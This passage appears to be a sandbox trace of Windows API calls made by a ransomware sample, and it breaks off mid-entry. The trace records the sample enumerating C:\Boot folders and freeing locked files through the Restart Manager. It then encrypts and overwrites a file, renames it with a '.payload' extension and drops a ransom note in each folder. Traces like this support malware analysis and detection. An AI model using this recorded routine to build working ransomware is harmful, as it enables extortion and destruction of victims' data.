FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0065.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0065.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0065.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0065.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0065.571] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0065.571] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 33 [0065.571] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0065.571] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.571] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0065.571] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0065.571] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.572] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0065.572] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0065.572] RmStartSession () returned 0x0 [0065.574] RmRegisterResources () returned 0x0 [0065.579] RmGetList () returned 0x0 [0065.739] RmEndSession () returned 0x0 [0065.816] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0065.816] FindNextFileW (in: hFindFile=0x6061e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0065.816] FindClose (in: hFindFile=0x6061e0 | out: hFindFile=0x6061e0) returned 1 [0065.816] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bg-BG\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0065.816] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\bg-bg\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0065.817] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0065.818] CloseHandle (hObject=0x430) returned 1 [0065.818] GetProcessHeap () returned 0x5e0000 [0065.818] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0065.818] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0065.818] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Windows") returned -1 [0065.818] lstrcmpiW (lpString1="bootspaces.dll", lpString2="$Recycle.bin") returned 1 [0065.818] lstrcmpiW (lpString1="bootspaces.dll", lpString2="System Volume Information") returned -1 [0065.818] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Program Files") returned -1 [0065.818] lstrcmpiW (lpString1="bootspaces.dll", lpString2="Program Files (x86)") returned -1 [0065.818] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bootspaces.dll") returned 26 [0065.818] StrStrIW (lpFirst="bootspaces.dll", lpSrch=".payload") returned 0x0 [0065.818] lstrcmpW (lpString1="bootspaces.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0065.818] lstrcmpW (lpString1="bootspaces.dll", lpString2="taridd") returned -1 [0065.818] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bootspaces.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0065.818] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.820] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0065.820] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0065.820] RmStartSession () returned 0x0 [0065.822] RmRegisterResources () returned 0x0 [0065.827] RmGetList () returned 0x0 [0065.969] RmEndSession () returned 0x0 [0066.160] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0066.160] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc498516b, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc498516b, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xef703e94, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0066.160] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Windows") returned -1 [0066.160] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="$Recycle.bin") returned 1 [0066.161] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="System Volume Information") returned -1 [0066.161] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files") returned -1 [0066.161] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Program Files (x86)") returned -1 [0066.161] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0066.161] StrStrIW (lpFirst="BOOTSTAT.DAT", lpSrch=".payload") returned 0x0 [0066.161] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.161] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="taridd") returned -1 [0066.161] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\BOOTSTAT.DAT", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0066.161] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0066.162] GetTickCount () returned 0x1150ef0 [0066.162] GetTickCount () returned 0x1150ef0 [0066.162] GetTickCount () returned 0x1150ef0 [0066.162] GetTickCount () returned 0x1150ef0 [0066.162] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x342f9b8*, pdwDataLen=0x342fa68*=0x80) returned 1 [0066.162] GetProcessHeap () returned 0x5e0000 [0066.162] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x6432a0 [0066.162] ReadFile (in: hFile=0x430, lpBuffer=0x6432a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesRead=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.164] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.164] WriteFile (in: hFile=0x430, lpBuffer=0x6432a0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x6432a0*, lpNumberOfBytesWritten=0x342fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.165] GetProcessHeap () returned 0x5e0000 [0066.165] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x6432a0 | out: hHeap=0x5e0000) returned 1 [0066.165] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.165] WriteFile (in: hFile=0x430, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.165] WriteFile (in: hFile=0x430, lpBuffer=0x342f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x342f9b8*, lpNumberOfBytesWritten=0x342fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.165] WriteFile (in: hFile=0x430, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.165] CloseHandle (hObject=0x430) returned 1 [0066.167] GetProcessHeap () returned 0x5e0000 [0066.167] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0066.167] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT_r00t_{nhhHyu}.payload") returned 46 [0066.167] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="\\\\?\\C:\\Boot\\BOOTSTAT.DAT_r00t_{nhhHyu}.payload" (normalized: "c:\\boot\\bootstat.dat_r00t_{nhhhyu}.payload")) returned 1 [0066.168] GetProcessHeap () returned 0x5e0000 [0066.168] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0066.168] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef4fcd12, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x185a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootvhd.dll", cAlternateFileName="")) returned 1 [0066.168] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Windows") returned -1 [0066.168] lstrcmpiW (lpString1="bootvhd.dll", lpString2="$Recycle.bin") returned 1 [0066.168] lstrcmpiW (lpString1="bootvhd.dll", lpString2="System Volume Information") returned -1 [0066.168] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Program Files") returned -1 [0066.168] lstrcmpiW (lpString1="bootvhd.dll", lpString2="Program Files (x86)") returned -1 [0066.168] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\bootvhd.dll") returned 23 [0066.168] StrStrIW (lpFirst="bootvhd.dll", lpSrch=".payload") returned 0x0 [0066.168] lstrcmpW (lpString1="bootvhd.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.168] lstrcmpW (lpString1="bootvhd.dll", lpString2="taridd") returned -1 [0066.168] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\bootvhd.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0066.168] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bootvhd.dll" (normalized: "c:\\boot\\bootvhd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.169] UuidCreate (in: Uuid=0x342f96c | out: Uuid=0x342f96c) returned 0x0 [0066.169] UuidToStringW (in: Uuid=0x342f96c, StringUuid=0x342f984 | out: StringUuid=0x342f984) returned 0x0 [0066.169] RmStartSession () returned 0x0 [0066.171] RmRegisterResources () returned 0x0 [0066.176] RmGetList () returned 0x0 [0066.278] RmEndSession () returned 0x0 [0066.334] RpcStringFreeW (in: String=0x342f984 | out: String=0x342f984) returned 0x0 [0066.334] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0066.334] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows") returned -1 [0066.334] lstrcmpiW (lpString1="cs-CZ", lpString2="$Recycle.bin") returned 1 [0066.334] lstrcmpiW (lpString1="cs-CZ", lpString2="System Volume Information") returned -1 [0066.335] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files") returned -1 [0066.335] lstrcmpiW (lpString1="cs-CZ", lpString2="Program Files (x86)") returned -1 [0066.335] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ") returned 17 [0066.335] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0066.335] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0066.335] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\cs-CZ", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0066.335] GetProcessHeap () returned 0x5e0000 [0066.335] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0066.335] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0066.335] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606220 [0066.335] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0066.335] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0066.335] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0066.335] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0066.335] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0066.335] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0066.335] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0066.335] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef511a4c, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0066.335] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0066.335] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0066.335] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0066.335] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0066.335] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0066.335] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0066.335] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0066.335] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0066.335] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2109581d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0066.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0066.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0066.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0066.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0066.336] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0066.336] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0066.336] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0066.336] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.336] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0066.336] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0066.336] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.336] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0066.336] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0066.336] RmStartSession () returned 0x0 [0066.339] RmRegisterResources () returned 0x0 [0066.362] RmGetList () returned 0x0 [0066.484] RmEndSession () returned 0x0 [0066.569] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0066.569] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0066.570] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0066.570] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0066.570] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0066.570] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0066.570] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0066.570] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui") returned 33 [0066.570] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0066.570] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.570] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0066.570] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0066.570] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\memtest.exe.mui" (normalized: "c:\\boot\\cs-cz\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0066.570] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0066.570] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0066.570] RmStartSession () returned 0x0 [0066.573] RmRegisterResources () returned 0x0 [0066.578] RmGetList () returned 0x0 [0066.762] RmEndSession () returned 0x0 [0066.849] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0066.849] FindNextFileW (in: hFindFile=0x606220, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef511a4c, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f1d4cf, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0066.849] FindClose (in: hFindFile=0x606220 | out: hFindFile=0x606220) returned 1 [0066.849] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0066.849] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\cs-cz\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0066.852] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0066.852] CloseHandle (hObject=0x430) returned 1 [0066.853] GetProcessHeap () returned 0x5e0000 [0066.853] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0066.853] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="da-DK", cAlternateFileName="")) returned 1 [0066.853] lstrcmpiW (lpString1="da-DK", lpString2="Windows") returned -1 [0066.853] lstrcmpiW (lpString1="da-DK", lpString2="$Recycle.bin") returned 1 [0066.853] lstrcmpiW (lpString1="da-DK", lpString2="System Volume Information") returned -1 [0066.853] lstrcmpiW (lpString1="da-DK", lpString2="Program Files") returned -1 [0066.853] lstrcmpiW (lpString1="da-DK", lpString2="Program Files (x86)") returned -1 [0066.853] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK") returned 17 [0066.853] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0066.853] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0066.853] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\da-DK", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0066.853] GetProcessHeap () returned 0x5e0000 [0066.853] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0066.853] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\*") returned 19 [0066.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, 